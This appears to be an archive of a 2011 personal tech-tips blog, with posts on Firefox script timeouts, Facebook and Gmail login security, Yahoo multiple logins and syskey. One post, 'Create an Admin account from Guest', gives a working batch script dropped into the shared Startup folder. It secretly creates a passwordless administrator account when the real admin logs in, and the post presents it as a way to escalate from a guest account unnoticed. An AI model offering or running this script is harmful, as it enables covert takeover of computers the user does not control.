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26 February 2011

Alphabet using book pages

Hi All

I just found this picture at internet and I liked those.Hope you will like this.
So I am giving here.

Here we go....


Please comment here if you like those.
If you have any suggestion what i can add more then please say to me.

Subhankar Ghosh

17 February 2011

How To Fix Unresponsive Script Warning In Firefox/Thunderbird

Hi ,

I’m sure a lot of you have already experienced this unresponsive script warning in Firefox and I’m also sure that you get irritated every time you see this because it wouldn’t stop nagging you. Actually, the reason behind this problem is the JavaScript may take a little longer than its usual time to finish its activity and then the application (Firefox) will think that the script is going wild and will never be finished processing thus causing the application to freeze or sometimes, crash.

Luckily, there’s a very simple way to fix this problem and that is to increase the amount of time before a script is considered ‘unresponsive’; this can be done in both Firefox and Thunderbird. 


  1. In a new tab type about:config in the address bar and press Enter
  2. In the about:config manager type dom.max_script_run_time in the Filter field
  3. Double click the entry and in the pop-up box type 20 and press Enter
  4. Close the tab.


  1. Go to Tools -> Options
  2. Click on the Advanced tab on top
  3. Click on the Config Editor at the Advanced Configuration options
  4. In the Config Editor type dom.max_script_run_time in the Filter field
  5. Double click the entry and in the pop-up box type 20 and press Enter
  6. Close the window

Its done!! Now you wont be getting the same again.
Hope this post helped you.If you have any doubt then please comment here I will try to clear those doubts.

Thank you

Subhankar Ghosh

16 February 2011

Protect Your Facebook From Being Hacked.


All of you use the Facebook. And if anyone of you worried about the security of your Facebook account then this post may help you.

Just follow these steps and make your Facebook more secure.


1.Log in to your Facebook account. and click on the Account Settings

2.After clicking on the Account Settings you will see a new page will look like:-

3.Now click on Mobile from the Top panel.After that you will get the following page:-

4.Click on Add Phone. You will get this page:-

5.Just select the Country and Mobile Career and click to Next.You will get this page.

6.Now Read the instruction carefully and do the same.Soon you will receive the code which you need to enter in this message.

7.Now you have successfully added your phone number to the Facebook. Now you will receive the SMS when ever you will log in to your Facebook account.

Enjoy!!Hope this post help you.
If you have any problem while doing this then please comment.

Thanks for reading the post.

Subhankar Ghosh

12 February 2011

Create an Admin account from Guest.

To create an administrator account is easy. You just need to use your guest account and create one administrator account instantly. Just follow the steps :
Open Notepad, paste the following :

@echo off
net user Newadmin /add /expires:never /passwordreq:no

net localgroup “Administrators” /add Newadmin

And save it to a bat file.
Now place this bat file in location local:\Documents and Settings\All Users\Start Menu\Programs\Startup

And when your admin logs into the system, the new account will be automatically created without the notice of the user. Next time when you login, you will get the user account for you.

Or if you want you can download.
Click HERE to download that file.

 1.Please remove that file after creating the account else it will make a new account after you restart the computer.


Multiple Logins in yahoo without Software

Hey All

I hope you all use the Yahoo! Messenger.
And one more thing about the Yahoo Messenger is that you can login only one time at a one computer.
But if you want to multiple login then you have to do some steps.These are written below:-


A) Method 1

1.Start---->Run----->Regedit------>Click ok.

2.You will get Registry Editor window in front of you.
   Just Navigate your self to

3.Carefully look at the Right hand side of the page, Right click on the blank area and choose new Dword

4. Rename that Dword into "Plural".

5.Change its value from 0 to 1.

6.Carefully close the registry.

7.Now use the Yahoo for Multiple Logins.

B) Method 2

If you are novice in computer then I'll suggest not to open the Registry.
Just download this file and it will do the same work for you.
Just download that file and install that one it will automatically do the above steps.

Click HERE to download that file

Registry is the most important part of the computer so do it carefully.

 If you have any doubts then comment here.

Thanks for reading this.

11 February 2011

Protect your Harddisk from being used by someone.

Everyone is using your computer?They even knows your password?Then I might have a solution for you.

Just do these steps:-

1.First you need log into main adminstrative account or you must have adminstrative privilage.

2.Start----->Run (For Windows XP)
Windows button on keyword+R..

3.It will open Run Window

4.Write over "syskey" without any inverted commas.

5.It will open a Securing the windows XP Account Database

6.Over there you will find Update click on it.

7.Click on Startup password and you need to give a password.

8.Click on Ok.

Now reboot your computer and Enjoy the Security

1.No one can get into your computer unless he/she knows the password.
2.If you forget the password in that case you need to format the your computer.

Two Step Security for you Gmail Account

If you security is your highest concern, and have a lot of important documents and e-mails on gmail which you would not like to fall into someone else’s hands, or have had spam sent through your gmail account, the new security feature by the gmail team, almost makes it impossible for anyone to hack into your account. It is a two step process to sign in. There will be a new link on your account settings page which looks like this:

Gmail advises to take that step nice and slow, and set it up properly in case you lose you primary phone. Once enabled, it will give an additional page after signing into Google, which asks for the verification code. Gmail can call you with the code or text it to you, or you may generate the code in an app on Android, iOS or Blackberry device.

This way you are pretty sure its only you who is logging in, because though someone else may have your password, your Phone remains with you. Further, if you use Remember Verification for thirty days, you will only have to enter the verification once every month.


This service will come soon in India.